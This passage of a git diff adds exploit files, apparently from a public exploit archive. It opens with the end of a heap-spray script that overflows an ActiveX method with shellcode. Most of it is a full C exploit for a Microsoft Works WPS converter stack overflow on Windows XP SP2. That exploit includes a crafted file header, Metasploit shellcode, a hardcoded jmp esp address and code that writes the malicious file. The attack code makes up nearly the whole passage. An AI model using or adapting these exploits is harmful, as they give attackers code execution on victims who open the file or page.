+block = bigblock.substring(0, bigblock.length-slackspace);
+
+while(block.length+slackspace<0x40000) block = block+block+fillblock;
+
+memory = new Array();
+
+for (x=0; x<300; x++) memory[x] = block + shellcode;
+
+var buffer = &#039;&#039;;
+
+while (buffer.length < 1319) buffer+="A";
+
+buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
+
+act.hgs_startNotify(buffer);
+
+%>
+
+
diff --git a/platforms/windows/remote/31118.c b/platforms/windows/remote/31118.c
new file mode 100755
index 000000000..d89721a09
--- /dev/null
+++ b/platforms/windows/remote/31118.c
@@ -0,0 +1,249 @@
+source: http://www.securityfocus.com/bid/27659/info
+
+Microsoft Works File Converter is prone to a remote code-execution vulnerability because it fails to adequately validate user-supplied input.
+
+An attacker could exploit this issue by enticing a victim to open a malicious '.wps' file.
+
+Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.
+
+/*
+* Copyright (c) 2008 chujwamwdupe - pumpernikiel.c
+*
+* one day in teletubby land...
+*
+* an email from idefense:
+*
+* "Unfortunately, Microsoft has refused to credit you using the name
+you requested."
+*
+* ...what's wrong with 'chujwamwdupe', eh?
+*
+*
+* Description:
+*    A vulnerability exists in WPS to RTF convert filter that is part
+*    of Microsoft Office 2003. It could be exploited by remote attacker
+*    to take complete control of an affected system. This issue is due to
+*    stack overflow error in function that read secions from WPS file.
+*    When we change size of for example TEXT section to number langer than
+*    0x10, stack overflow occurs - very easy to exploit.
+*
+*
+* Tested on:
+*      Microsoft Windows XP Service Pack 2 && Microsoft Office 2003
+*
+* Usage:
+*     wps.exe 1 evil.wps
+*
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+/* WPS Header */
+unsigned char uszWpsHeader[] =
+"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
+"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
+"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00"
+"\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xfd\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff\x04\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
+"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x16\x00\x05\x00\xff\xff\xff\xff\xff\xff\xff\xff\x01\x00\x00\x00"
+"\xb2\x5a\xa4\x0e\x0a\x9e\xd1\x11\xa4\x07\x00\xc0\x4f\xb9\x32\xba"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x10\xb9\x5f"
+"\x53\x8f\xc7\x01\x03\x00\x00\x00\xc0\x0a\x00\x00\x00\x00\x00\x00"
+"\x43\x00\x4f\x00\x4e\x00\x54\x00\x45\x00\x4e\x00\x54\x00\x53\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x01\x02\x00\x00\x00\x03\x00\x00\x00\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x28\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x00"
+"\x53\x00\x50\x00\x45\x00\x4c\x00\x4c\x00\x49\x00\x4e\x00\x47\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x2a\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00"
+"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
+"\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
+"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
+"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
+"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00"
+"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
+"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
+"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00"
+"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\xfe\xff\xff\xff"
+"\x29\x00\x00\x00\xfe\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\x43\x48\x4e\x4b\x57\x4b\x53\x20\x04\x00\x08\x00\x0e\x00\x00\x03"
+"\x00\x02\x00\x00\x00\x0a\x00\x00\xf8\x01\x0e\x00\xff\xff\xff\xff"
+"\x18\x00\x54\x45\x58\x54\x00\x00\x2f\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
+
+/* Shellcode - metasploit exec calc.exe */
+unsigned char uszShellcode[] =
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
+"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
+"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
+"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
+"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
+"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
+"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
+"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
+"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
+"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
+"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
+"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
+"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
+"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
+"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
+"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
+"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
+"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
+"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
+"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
+
+char szIntro[] =
+"\n\t\tMicrosoft Office .WPS Stack Overflow\n"
+"\t\t\tAdam Walker (c) 2007\n"
+"[+] Targets:\n"
+"\t(1) Windows XP SP2 ntdll.dll de\n"
+"Usage: wps.exe <target> <file>";
+
+typedef struct {
+    const char *szTarget;
+    unsigned char uszRet[5];
+} TARGET;
+
+TARGET targets[] = {
+    { "Windows XP SP2 de ntdll.dll", "\xED\x1E\x94\x7C" },        /* jmp esp */
+};
+
+int main( int argc, char **argv ) {
+    char szBuffer[1024*10];
+    FILE *f;
+    void *pExitProcess[4];
+
+    if ( argc < 3 ) {
+        printf("%s\n", szIntro );
+        return 0;
+    }
+
+    memset(szBuffer, 0x90, 1024*10);
+
+    printf("[+] Creating WPS header...\n");
+    memcpy( szBuffer, uszWpsHeader, sizeof( uszWpsHeader ) - 1 );
+
+    printf("[+] Copying addr && nops && shellcode...\n");
+    memcpy( szBuffer + sizeof( uszWpsHeader ) - 1, targets[atoi( argv[1]
++ 1 )].uszRet, 4 );
+    memcpy( szBuffer + sizeof( uszWpsHeader ) + 3, uszShellcode, sizeof(
+uszShellcode ) - 1 );
+
+    f = fopen( argv[2], "wb" );
+    if ( f == NULL ) {
+        printf("[-] Cannot create file\n");
+        return 0;
+    }
+
+    fwrite( szBuffer, 1, sizeof( szBuffer) , f );
+    fclose( f );
+    printf("[+] .WPS file succesfully created!\n");
+    return 0;
+}